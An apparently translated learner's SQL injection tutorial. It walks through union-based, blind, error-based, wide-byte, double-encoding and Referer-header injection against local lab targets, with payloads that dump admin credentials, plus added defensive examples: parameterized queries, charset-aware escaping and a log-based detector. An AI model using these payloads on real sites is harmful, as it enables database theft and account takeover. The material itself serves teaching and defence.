What is SQL injection:
SQL injection means inserting SQL commands into the input that a web form, query string, domain name or page request submits, so that the server is tricked into executing malicious SQL commands.
What harm does SQL injection do?
Harm: data leakage, dumping the whole database, tampering with the site, destroying the database, planting a backdoor, getshell (taking over the server).
Why do SQL injection vulnerabilities occur?
Data entered by the user is executed by the back end as code, which violates the principle that code and data must be kept separate (this is the essence).
The data passed from the front end is attacker-controllable (controllable parameters), and the back end does not filter it, or filters it loosely, before using it in the query; together these are the causes of SQL injection.
First of all, I have only just learned forty-five SQL injection methods, learning as I read, so forgive me if something is wrong =. =
I think SQL injection is simple once the injection point is found; at worst I try every method one by one, although that costs a lot of time.
So, since SQL vulnerabilities can appear anywhere the application interacts with the database, finding the injection points in those places is very important.
SQL injection: common database functions and constants
Common database functions and constants
@@tmpdir    temporary directory
@@datadir   data directory
@@basedir   directory where the database is installed
@@version   version
@@hostname  host name of the current database server
user()      current user
version()   version
database()  current database
concat()
group_concat()
concat_ws()
substr(): Oracle, MySQL, MSSQL / substring(): MySQL, MSSQL / mid(): MySQL; string extraction
Note: all three take three parameters: the string to take from, the starting index, and the length to take
left(pa1 (string), pa2 (length)) takes characters from the left of the string
right(pa1 (string), pa2 (length)) takes characters from the right of the string
sleep() makes the database pause
ord() returns the ASCII code of a character
if(condition, value or statement returned when the condition is true, value or statement returned when the condition is false)
if(1=1,true,false)
CASE WHEN condition THEN value-or-statement-when-true ELSE value-or-statement-when-false END
SELECT 1, CASE WHEN 1=1 THEN "hallo" ELSE "goodbye" END, 3;
length() computes the length of a string
UNION query:
SELECT * FROM USERS WHERE id=1 UNION SELECT "a","b","c";
select * from users where user_id=0 union select 1,2,user(),4,5,database(),7;
MySQL: the three fields of the information_schema table that matter
MySQL > 5.0
information_schema: the system library that MySQL ships with from 5.0 onwards; it summarizes every other database (database names, table names, field names)
Its columns table stores that data (database names, table names, field names); three of its fields need attention:
table_schema: stores the names of the other databases
table_name: stores the table names of the other databases
column_name: stores the field names of the other databases
select table_schema, table_name, column_name from information_schema.columns; -- queries the table_schema (database name), table_name (table name) and column_name (field name) data
select table_schema, table_name, column_name from information_schema.columns where table_schema = "dvwa"; -- lists all tables and fields of the dvwa database (dvwa can also be written in hex)
I. Manual injection (seven steps; I believe five are enough)
1. Detect the injection point (anywhere SQL injection may exist): look for ID-like parameters (id / uid / typeid / sid / key ...) (Google Hacking helps), then append some malicious test input after the value:
'
'and 1=1#
'and 1=2--
-1' or '1'='1
...
Whether a single quote is needed depends on how the back-end SQL statement is concatenated, for example:
id='$id'  front-end test: id=1' and 1=1%23
id=$id    front-end test: id=1 and 1=1%23
If the malicious payload executes successfully (judging by the page output and error messages), an SQL injection point exists here.
Next decide on the injection method, mainly from how the page echoes the result.
Determine how many columns the back-end database selects, and which of them are displayed on the front end:
http://localhost/jdy1.5/typeid.php?typeid=1 order by 5%23
Change the number; the point at which the page breaks gives the number of columns selected by the back-end query, here 5
union select 1,2,3,4,5%23
http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,2,3,4,5%23
The page shows position 2 on the front end, so column 2 can be replaced with an SQL expression
2. Collect information about the back-end database
View the current user: http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,user(),3,4,5%23
View the current database: http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,database(),3,4,5%23
http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,(select group_concat(distinct table_schema) from information_schema.columns),3,4,5%23 -- list all databases
group_concat concatenates the rows of a group; distinct removes duplicates
3. Get the table names of the current database
http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,(select group_concat(distinct table_name) from information_schema.columns where table_schema=jdycms),3,4,5%23 -- jdycms must be written in hex
4. Get the field names of the specified table in the current database
http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name=jdy_admin ),3,4,5%23
jdy_admin must be written in hex
5. Get the field data
http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,(select group_concat(username,0x7e,password) from jdy_admin limit 0,1 ),3,4,5%23
limit 0,1 takes one row starting from row 0; 0x7e is the separator ~
group_concat displays all selected rows concatenated together
6. Crack the hash: cmd5, pmd5 and many other services
7. Find the admin login page: guessing, directory scanning, information gathering
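The seven steps above work because the typeid value is spliced into the statement text. The following added example (not code from the original post or from the site it targets) reproduces that in an in-memory SQLite database and places it beside the two defensive forms: binding the value as a parameter, and enforcing the integer type before the database is touched. The table names posts and admin, their columns, and the sample rows are constructed for the demonstration.

```python
import sqlite3

# Constructed stand-in for a "typeid" lookup page; table and column names
# are assumptions, not the schema of the site in the post.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts (id INTEGER, typeid INTEGER, title TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO posts VALUES (1, 1, 'hello'), (2, 2, 'second');
        INSERT INTO admin VALUES ('admin', 'constructed-hash-value');
    """)
    return conn

def lookup_vulnerable(conn, typeid):
    # The value is spliced into the statement text, so any SQL keywords in it
    # are parsed as SQL: this is the pattern the steps above exploit.
    sql = f"SELECT id, title FROM posts WHERE typeid={typeid}"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, typeid):
    # The value is bound as a parameter and compared as data only; the
    # database never parses it as SQL, so "UNION SELECT" inside it is inert.
    sql = "SELECT id, title FROM posts WHERE typeid=?"
    return conn.execute(sql, (typeid,)).fetchall()

def lookup_validated(conn, typeid):
    # Strictest form: enforce the expected type before touching the database,
    # then still bind the value.
    try:
        typeid_int = int(typeid)
    except (TypeError, ValueError):
        raise ValueError("typeid must be an integer") from None
    return lookup_parameterized(conn, typeid_int)

def is_rejected(conn, typeid):
    # True when the validated lookup refuses the value.
    try:
        lookup_validated(conn, typeid)
    except ValueError:
        return True
    return False

# Same shape as the post's step-5 payload: an id that matches nothing,
# then a SELECT with the same column count as the original query.
PAYLOAD = ("1000000000000 UNION SELECT 1, "
           "(SELECT username || '~' || password FROM admin LIMIT 1)")

def run_demo():
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),
        "parameterized": lookup_parameterized(conn, PAYLOAD),
        "validated_rejects": is_rejected(conn, PAYLOAD),
    }

if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result}")
```

The parameterized lookup returns no rows for the payload because SQLite compares the whole string against the integer column and it matches nothing; the validated lookup never reaches the database at all. Binding alone is enough to stop the injection; the type check additionally gives a clean place to log the rejected input.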
II. Blind injection (divided into Boolean-based and time-based)
Blind injection: after the user-submitted data is executed by the back-end database no data is returned, so test results cannot be displayed on the front end and blind techniques are needed.
Boolean-based blind
Time-based blind
Boolean-based blind injection:
1. Probe the input point: ' / 1' and 1=1%23 / 1' and '1'='1%23
Note: whether the user data is passed to the database and executed, and therefore whether an injection point exists here, is judged from what the page displays
2. Collect database information (current user name, current database, version)
http://localhost/sqli-labs-master/Less-8/index.php?id=10' and length(user())=14%23
Is the length of the user name 14? (use Burp Intruder to iterate over the values)
3.
http://localhost/sqli-labs-master/Less-8/index.php?id=10' and ascii(substr(user(),1,1))=114%23
(ascii() is used to determine the characters one by one) the first letter of the user name has ASCII code 114, i.e. r; continuing in sequence gives root@localhost
ascii(substr((select distinct table_name from information_schema.columns where table_schema=database() limit 0,1),1,1))=114
First determine the length of a table name, then judge each character
Eventually the valuable table is found: users
4. Get the fields of the table
select distinct column_name from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 0,1
The first character of the first field is the letter i; determine the first field name character by character, then the second field name, and so on
Finally the sensitive fields are found: username, password
5. Then get the data of the specified fields
select group_concat(username,0x7e,password) from users limit 0,1
6. Decrypt the ciphertext data and log in to the back end
Time-based blind injection:
Concept: use a particular function to make the database wait for a certain time, and judge whether the page is injectable from its response time
Function: sleep()
select * from dvwa.users where user_id=1 and if(length(user())=14,sleep(5),'true');
Nothing is returned in the end; watch the browser's response time instead
benchmark(parameter 1, parameter 2): parameter 1 is the number of times to execute, parameter 2 is the function or expression to execute. select benchmark(1000000,1000*1000);
1. Find the injection point
2. Get database information
Length of the current database:
select * from dvwa.users where user_id=1 and if(length(database())=14,sleep(5),'true');
Get each character:
select * from dvwa.users where user_id=1 and if(ascii(substring(database(),1,1))=114,sleep(5),'true');
3. Get the tables of the current database
select * from dvwa.users where user_id=1 and if(ord(mid((select distinct table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102,sleep(5),'true');
Find the valuable table: users
4. Get the fields of the specified table
select * from dvwa.users where user_id=1 and if(ord(mid((select distinct column_name from information_schema.columns where table_schema=database() and table_name=0x7573657273 limit 0,1),1,1))=102,sleep(5),'true');
Find the interesting fields: username, password
5. Get the content
select * from dvwa.users where user_id=1 and if(ord(mid((select concat(username,0x7e,password) from dvwa.users limit 0,1),1,1))=102,sleep(5),'true');
III. Error-based injection (judged from the returned error message)
Error-based injection
Error-based means: build a payload with certain functions that provoke an error; when the database executes it, the error message carries the data we want.
Error functions:
(1) extractvalue(parameter 1, parameter 2) returns a string queried from the target XML: parameter 1 is an XML document, parameter 2 is an XPath-format string (needs checking)
select extractvalue(1,concat(0x7e,(select user()),0x7e));
(2) updatexml(parameter 1, parameter 2, parameter 3) changes the value of the matching nodes of an XML document: parameter 1 is the XML document, parameter 2 is an XPath-format string, parameter 3 is the string that replaces the matched data
select updatexml(1,concat(0x7e,(select user()),0x7e),1);
Note: the error message of the first two functions is limited to 32 characters
(3) floor(): must be used together with count(), rand() (generates a random decimal between 0 and 1; given a seed, the sequence is fixed) and group by (other functions that achieve the same effect can be substituted!)
select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a
Reading it: select count(*) counts all records; concat(user(),floor(rand(0)*2)) concatenates the two values and the result is aliased x; from information_schema.tables group by x
The data is leaked through the error that group by raises on floor(rand(0)*2). The reason group by errors is the uncertainty of floor(rand(0)*2), which may be 0 or 1. The principle of group by with a key: rows are read one by one and the result is kept in a temporary table. When a row's key is read, if the key already exists in the temporary table, that row's data in the temporary table is updated; if the key does not exist, the key is inserted into the temporary table as a new row. With group by floor(rand(0)*2) the key is a random number: it is computed once to check whether it exists in the temporary table, and computed again when the row is inserted. Suppose the temporary table holds only one row with key 1 and the check computes floor(rand(0)*2) as 0: key 0 is absent, so the row must be inserted, but the key is recomputed for the insert and may now be 1, which collides with the existing row and raises a duplicate-key error. The error is caused by the two computations of the random value giving different results.
IV. Wide-byte injection (bypassing the escaping of special characters)
mysql_query("SET NAMES 'gbk'"); // set the character set encoding
mysql_set_charset("GBK"); // set the character set encoding
mysql_real_escape_string()
Escaping filters the parameters; functions with a similar role are addslashes(), mysql_escape_string() [deprecated after PHP 5.3] and magic quotes (the magic_quotes_gpc setting); they act on particular symbols such as ' " \ null < > and the like
GBK encoding is a character encoding in which one character is encoded using two bytes
1%df'  →  1%df\'  →  1%df%5c%27  →  1(%df%5c)%27  →  1運'
SELECT * FROM news WHERE tid='{$id}'
SELECT * FROM news WHERE tid='{1運'}' -> error
Principle of the vulnerability: the database interprets the bytes as GBK after the escaping function has run, so the backslash byte added by the filter is merged with the byte submitted by the user into one wide character
Test procedure
1. Visit http://localhost/gbksql/01/?id=1' and look at the returned result
2. http://localhost/gbksql/01/?id=1%df' (why %df? can any high byte after 81, i.e. 81–fe, be used?) 1%df' ----> 1%df\' ---> 1%df%5c' ---> 1運'
3. http://localhost/gbksql/01/?id=-1%81' union select 1,user(),3%23
PDO prevents wide-byte SQL injection:
PDO flow: connect to the database -> set the statement template -> bind the data -> execute the SQL statement
$conn->setAttribute(PDO::ATTR_EMULATE_PREPARES, false) prevents most SQL injection
https://www.jianshu.com/p/c0deb8061718
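The byte sequence in step 2 above is easy to verify without MySQL. The following added example (not code from the original post, and not a PHP or MySQL API) walks through the mechanism in Python: escape_bytewise stands in for escaping done without knowledge of the connection charset, and escape_charset_aware is the corrected form, which decodes the input strictly as GBK before escaping so that a stray lead byte is rejected instead of swallowing the backslash. The helper names and the request bytes are assumptions constructed for the demonstration; in PHP the equivalent fix is to set the charset on the connection and use prepared statements as the PDO section describes.

```python
# Byte-level walk-through of the wide-byte bypass, with the charset-aware
# alternative that rejects it. Helper names are assumptions for this example.

def escape_bytewise(data: bytes) -> bytes:
    # Charset-unaware escaping: a backslash byte (0x5c) is placed before every
    # quote or backslash byte, with no knowledge of multibyte sequences.
    out = bytearray()
    for b in data:
        if b in b"'\"\\":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def unsafe_pipeline(raw: bytes) -> str:
    # Escape on bytes, then let the database read the bytes as GBK:
    # 0xdf 0x5c becomes one two-byte character and the quote is live again.
    return escape_bytewise(raw).decode("gbk")

def escape_charset_aware(data: bytes, charset: str = "gbk") -> str:
    # Decode strictly before escaping. A lone lead byte such as 0xdf followed
    # by 0x27 is not a valid GBK sequence and is rejected rather than escaped;
    # valid text is escaped per character, so the backslash can never be
    # merged into a neighbouring character when the result is re-encoded.
    text = data.decode(charset)  # raises UnicodeDecodeError on malformed input
    return (text.replace("\\", "\\\\")
                .replace("'", "\\'")
                .replace('"', '\\"'))

def safe_pipeline(raw: bytes):
    # Returns the escaped text, or None when the input is rejected.
    try:
        return escape_charset_aware(raw)
    except UnicodeDecodeError:
        return None

# Constructed request values as the server sees them for "?id=1%df'" and "?id=1'".
RAW_WIDE_BYTE = b"1\xdf'"
RAW_PLAIN = b"1'"

if __name__ == "__main__":
    print(repr(unsafe_pipeline(RAW_WIDE_BYTE)))  # backslash swallowed by the wide char
    print(repr(safe_pipeline(RAW_WIDE_BYTE)))    # None: rejected
    print(repr(safe_pipeline(RAW_PLAIN)))        # quote escaped
```

Run it and compare the first two lines of output: the bytewise path yields three characters ending in an unescaped quote, while the charset-aware path refuses the same bytes. The plain quote still escapes normally, so the check does not break legitimate input.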
V. Double-encoding injection:
By default the browser URL-encodes the data from the form, and it is decoded once when it reaches the server
PHP's URL-decoding functions are urldecode() and rawurldecode()
VI. HTTP header injection (SQL injection through HTTP header fields, here Referer)
Step 1: the database name is security
Referer: ' or updatexml(1,concat('#',(database())),0),'')#
Step 2: the table is users
Referer: ' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'')#
Step 3: the field names are id, username, password
Referer: ' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'')#
Step 4: the data
Referer: ' or updatexml(1,concat('#',(select * from (select concat_ws('#',id,username,password) from users limit 0,1) a)),0),'')#
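Every technique in sections I to VI leaves a recognisable trace in the request: a UNION SELECT or information_schema reference, sleep()/benchmark() calls, updatexml()/extractvalue() calls, and-1=1 style probes, ascii(substr()) character probes, a high byte before a quote, and payloads that only appear after a second round of URL decoding, whether in the query string or in a header such as Referer. The following added example (not code from the original post) is a small detector for access-log lines that parses the request line and Referer from combined-format entries, decodes the text until it stops changing so double-encoded payloads are seen in final form, checks the wide-byte pattern on the raw text (decoding destroys the lone lead byte), and labels each line. The log lines, paths and timestamp are constructed for the demonstration and mirror the payload shapes shown above; the indicator list is deliberately coarse and is a starting point, not a complete ruleset.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Combined-format access log: we only need the request line and the Referer.
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def decode_fully(value: str, max_rounds: int = 3) -> str:
    # Decode until the text stops changing, so a double-encoded payload
    # (%2520 -> %20 -> space) is inspected in its final form.
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

INDICATORS = [
    ("union-select",  re.compile(r"\bunion\b\s+(?:all\s+)?\bselect\b", re.I)),
    ("schema-enum",   re.compile(r"\binformation_schema\b", re.I)),
    ("time-based",    re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("error-based",   re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)),
    ("boolean-probe", re.compile(r"\b(?:and|or)\b\s*['\"]?\s*\d+\s*=\s*\d+", re.I)),
    ("char-probe",    re.compile(r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid)\s*\(", re.I)),
]
# A percent-encoded high byte (0x81-0xfe) immediately followed by a quote,
# checked on the raw text because decoding destroys the lone lead byte.
# Coarse: legitimate GBK text ending right before a quote also matches.
WIDE_BYTE = re.compile(r"%(?:8[1-9a-f]|[9a-f][0-9a-f])(?:%27|')", re.I)

def classify(raw: str) -> List[str]:
    hits = []
    if WIDE_BYTE.search(raw):
        hits.append("wide-byte")
    text = decode_fully(raw)
    for name, pattern in INDICATORS:
        if pattern.search(text):
            hits.append(name)
    return hits

def scan(lines: List[str]) -> Dict[int, List[str]]:
    # Map 1-based line number -> indicator names, for lines that hit anything.
    findings = {}
    for number, line in enumerate(lines, start=1):
        m = LOG_RE.search(line)
        if not m:
            continue
        hits = classify(m.group("path") + " " + m.group("referer"))
        if hits:
            findings[number] = hits
    return findings

def log_line(path: str, referer: str = "-") -> str:
    # Builds one constructed combined-format entry (client, time and UA are fixed).
    return ('127.0.0.1 - - [10/Oct/2020:13:55:36 +0000] '
            f'"GET {path} HTTP/1.1" 200 512 "{referer}" "Mozilla/5.0"')

# Constructed log lines mirroring the payload shapes in the sections above.
LOG_LINES = [
    log_line("/jdy1.5/typeid.php?typeid=1"),
    log_line("/jdy1.5/typeid.php?typeid=1000000000000%20union%20select%201,user(),3,4,5%23"),
    log_line("/sqli-labs-master/Less-8/index.php?id=10'%20and%20ascii(substr(user(),1,1))=114%23"),
    log_line("/dvwa/vulnerabilities/sqli_blind/?id=1%20and%20if(length(database())=14,sleep(5),'true')"),
    log_line("/gbksql/01/?id=1%df'"),
    log_line("/index.php?id=1%2520union%2520select%25201,2,3"),
    log_line("/sqli-labs-master/Less-18/", "' or updatexml(1,concat('#',(database())),0),'')#"),
    log_line("/jdy1.5/typeid.php?typeid=1'%20and%201=1%23"),
    log_line("/jdy1.5/typeid.php?typeid=1000000000000%20union%20select%201,"
             "(select%20group_concat(distinct%20table_schema)%20from%20information_schema.columns),3,4,5%23"),
]

if __name__ == "__main__":
    for number, hits in sorted(scan(LOG_LINES).items()):
        print(f"line {number}: {', '.join(hits)}")
```

The first constructed line is a normal request and produces no finding; each of the others is labelled with the section whose payload shape it carries. The Referer line shows why header fields must be fed to the same checks as the query string, and the %2520 line shows why the decode loop matters: a single unquote_plus would still see "%20union%20select" and the union-select pattern would not fire.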